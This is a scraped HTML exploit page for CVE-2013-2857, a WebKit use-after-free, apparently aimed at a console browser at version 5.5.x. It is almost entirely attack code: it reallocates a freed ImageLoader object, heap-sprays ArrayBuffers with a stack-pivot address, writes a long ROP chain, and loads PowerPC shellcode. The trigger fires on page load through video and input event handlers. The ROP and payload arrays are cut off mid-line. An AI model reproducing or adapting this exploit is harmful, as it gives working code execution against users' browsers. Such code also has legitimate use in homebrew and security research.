103 lines
50 KiB
HTML
103 lines
50 KiB
HTML
|
<!--
|
||
|
Tested on 5.5.1
|
||
|
CVE-2013-2857
|
||
|
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
|
||
|
Result: Bug is present, crash
|
||
|
-->
|
||
|
<html>
|
||
|
<head>
|
||
|
<script>
|
||
|
function UaF(a){
|
||
|
var pivotAdress = 17489356;
|
||
|
//5.5.2
|
||
|
{
|
||
|
var pivotAdressAdress = 461373440; //r6
|
||
|
}
|
||
|
|
||
|
var codegenAddress = 0x01800000; // don't change this.
|
||
|
var sizeWebCoreImageLoader = 0x18; // don't change this.
|
||
|
|
||
|
var _16K = 0x4000;
|
||
|
var _4K = 0x1000;
|
||
|
|
||
|
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
||
|
a.type="radio";
|
||
|
|
||
|
//Allocate this new WebCore::ImageLoader over freed WebCore::
|
||
|
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
|
||
|
var dv = new DataView(ab)
|
||
|
|
||
|
/*
|
||
|
0:000:x86> dt webkit!WebCore::ImageLoader
|
||
|
+0x000 __VFN_table : Ptr32
|
||
|
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
|
||
|
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
|
||
|
+0x00c m_failedLoadURL : WTF::AtomicString
|
||
|
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
|
||
|
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
|
||
|
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
|
||
|
+0x010 m_imageComplete : Pos 3, 1 Bit
|
||
|
+0x010 m_loadManually : Pos 4, 1 Bit
|
||
|
+0x010 m_elementIsProtected : Pos 5, 1 Bit
|
||
|
*/
|
||
|
//Register:r3 Adress:0x1AF35330-0x1AF35360
|
||
|
dv.setUint32(0x00, 0x00000000); //vtable
|
||
|
dv.setUint32(0x04, pivotAdressAdress); //m_client
|
||
|
dv.setUint32(0x08, pivotAdressAdress); //m_image
|
||
|
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
||
|
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
||
|
dv.setUint32(0x14, 0x00000000); //padding
|
||
|
|
||
|
var realROPChain = [0x010204c8, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0107dd70, 0x01043150, 0x00000000, 0x00000000, 0x00000002, 0x00000000, 0x01080274, 0x010429dc, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0107dd70, 0x010418e4, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x48000005, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000000, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7f84e378, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000004, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7fa3eb78, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000008, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7f66db78, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d00000c, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38c60004, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000010, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x80a40000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000014, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38840004, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000018, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7c053000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d00001c, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x4082fff4, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000020, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7f45d378, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000024, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38c00002, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000028, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7ca53430, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d00002c, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7ca903a6, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000030, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x80a40000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000034, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x90a30000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000038, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38840004, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x0
|
||
|
var payload= [0x3c201ab5, 0x6021d138, 0x480010c1, 0x9421ffe0, 0x3d200102, 0x7c0802a6, 0x3ca00180, 0x6129b828, 0x93e1001c, 0x90010024, 0x7c9f2378, 0x38c10008, 0x38a513f8, 0x38800000, 0x7d2903a6, 0x4e800421, 0x2f9f0000, 0x3bffffff, 0x40be000c, 0x39610020, 0x480012f8, 0x81210008, 0x7d2903a6, 0x4e800421, 0x4bffffe0, 0x9421ffc8, 0x7c0802a6, 0x3ca00180, 0x38800000, 0xbfa1002c, 0x3fc00102, 0x63deb828, 0x9001003c, 0x7fc903a6, 0x38c1001c, 0x38a51406, 0x7c7f1b78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c10018, 0x38a5140d, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c10014, 0x38a5141f, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c10010, 0x38a5142e, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c1000c, 0x38a51440, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x38c10008, 0x38a51449, 0x38800000, 0x7fc903a6, 0x7fe3fb78, 0x4e800421, 0x81210008, 0x7d2903a6, 0x4e800421, 0x81210018, 0x7c7d1b78, 0x38800040, 0x7d2903a6, 0x38600100, 0x4e800421, 0x8121001c, 0x38a00100, 0x38800000, 0x7d2903a6, 0x7c7e1b78, 0x4e800421, 0x81210010, 0x38e00000, 0x38c00000, 0x38a00003, 0x7fc4f378, 0x7d2903a6, 0x7fa3eb78, 0x4e800421, 0x8121000c, 0x7fa3eb78, 0x7d2903a6, 0x4e800421, 0x81210014, 0x7fc3f378, 0x7d2903a6, 0x4e800421, 0x3c80000f, 0x6084fffc, 0x7fe3fb78, 0x4bfffe61, 0x39610038, 0x4800118c, 0x39450001, 0x39200000, 0x7d4903a6, 0x4200000c, 0x38600000, 0x4e800020, 0x7d4348ae, 0x7d0448ae, 0x7f8a4000, 0x409e000c, 0x39290001, 0x4bffffe0, 0x38600001, 0x4e800020, 0x39450001, 0x39200000, 0x7d4903a6, 0x42000008, 0x4e800020, 0x7d4448ae, 0x7d4349ae, 0x39290001, 0x4bffffec, 0x9421ffe8, 0x7c0802a6, 0x9001001c, 0xbf810008, 0x7c7e1b78, 0x7c9d2378, 0x7cbf2b78, 0x3f800180, 0x7f9fe000, 0x40be005c, 0x3f800f84, 0x3fe00d80, 0x639c8a0c, 0x7fa5eb78, 0x7fc4f378, 0x7fe3fb78, 0x4bffff65, 0x2f830000, 0x419e002c, 0x3bff0004, 0x7f9fe000, 0x409effe0, 0x3d200103, 0x3c600180, 0x61291618, 0x38631451, 0x7d2903a6, 0x3be00000, 0x4e800421, 0x39610018, 0x7fe3fb78, 0x480010ac, 0x7fa5eb78, 0x7fc4f378, 0x7fe3fb78, 0x4bffff19, 0x2f830000, 0x41beffe0, 0x3bff0004, 0x4bffff84, 0x9421fff0, 0x7c0802a6, 0x93e1000c, 0x7c7f1b78, 0x90010014, 0x38600001, 0x38800000, 0x38a00000, 0x38c00000, 0x38e00000, 0x3d000001, 0x7fe9fb78, 0x38003400, 0x7c3f0b78, 0x44000002, 0x60000000, 0x7fe1fb78, 0x7c7f1b78, 0x39610010, 0x7fe3fb78, 0x48001044, 0x9421fff0, 0x7c0802a6, 0xbfc10008, 0x7c7f1b78, 0x90010014, 0x7c9e2378, 0x38600001, 0x38800000, 0x7fc5f378, 0x38c00000, 0x38e00000, 0x3d000001, 0x7fe9fb78, 0x7c3e0b78, 0x38003500, 0x44000002, 0x60000000, 0x7fc1f378, 0x39610010, 0x48000ff0, 0x9421fed0, 0x7c0802a6, 0x39200000, 0x90010134, 0x388100ec, 0x912100ec, 0x3d200102, 0x6129a3b4, 0xbea10104, 0x83e30004, 0x7c7a1b78, 0x3c600180, 0x7d2903a6, 0x38631463, 0x3fc00102, 0x63deb828, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100e8, 0x38a5146b, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100e4, 0x38a51475, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100e0, 0x38a5147b, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100dc, 0x38a51488, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100d8, 0x38a5149a, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100d4, 0x38a514a7, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100d0, 0x38a5140d, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100cc, 0x38a5141f, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100c8, 0x38a514bd, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100c4, 0x38a514cc, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100c0, 0x38a514db, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100bc, 0x38a514e8, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c100b8, 0x7fe3fb78, 0x38a513f8, 0x38800000, 0x4e800421, 0x3d200180, 0x3be9135c, 0x8109135c, 0x815f0004, 0x3880000c, 0x813f0008, 0x38610088, 0x80a100e8, 0x91010088, 0x9141008c, 0x91210090, 0x4bfffce1, 0x811f000c, 0x3880000c, 0x815f0010, 0x7c771b78, 0x813f0014, 0x3861007
|
||
|
//Spray large ArrayBuffer with pivotAdress, increase the spray for a bigger ROP exeuction chance (affects the position of the payload)
|
||
|
var ar = new Array(0x1800*2);
|
||
|
for(var i=0; i<0x1800*2; i++){
|
||
|
ar[i] = new DataView(new ArrayBuffer(_4K));
|
||
|
for(var j=0; j<_4K; j+=8){
|
||
|
ar[i].setFloat64(j, 0x10000000+j); //filler
|
||
|
}
|
||
|
|
||
|
ar[i].setUint32(0x204, 0x0);
|
||
|
ar[i].setUint32(0x018, pivotAdressAdress);
|
||
|
ar[i].setUint32(0x000, pivotAdressAdress+0x20);
|
||
|
ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
|
||
|
//r11, new stack location
|
||
|
ar[i].setUint32(0x208, pivotAdressAdress+0x300);
|
||
|
|
||
|
//initialize this Rop Chain
|
||
|
var ropCurrentOffset = 0x304;
|
||
|
|
||
|
//start of the Rop Chain
|
||
|
realROPChain.forEach(function(element) {
|
||
|
ar[i].setUint32(ropCurrentOffset, element);
|
||
|
ropCurrentOffset += 4;
|
||
|
});
|
||
|
}
|
||
|
var payloadBuffer = new DataView(new ArrayBuffer(_16K));
|
||
|
payloadBuffer.setUint32(0, 3735924734); // Place search for value
|
||
|
var curOffset = 4;
|
||
|
for(var curI = 0; curI< payload.length;curI++){
|
||
|
payloadBuffer.setUint32(curOffset,payload[curI]);
|
||
|
curOffset += 4;
|
||
|
}
|
||
|
|
||
|
//Use the new WebCore::ImageLoader & pivot !
|
||
|
return 0;
|
||
|
}
|
||
|
function sleep(ms) {
|
||
|
var unixtime_ms = new Date().getTime();
|
||
|
while(new Date().getTime() < unixtime_ms + ms) {}
|
||
|
x.type='image';
|
||
|
}
|
||
|
</script>
|
||
|
|
||
|
</head>
|
||
|
<body>
|
||
|
<input id="x" type="hidden" onerror="UaF(this);" src=""/>
|
||
|
<video onloadstart="sleep(500)">
|
||
|
<source src="indexiine.mp4" type="video/mp4">
|
||
|
</video>
|
||
|
|
||
|
</body>
|
||
|
</html>
|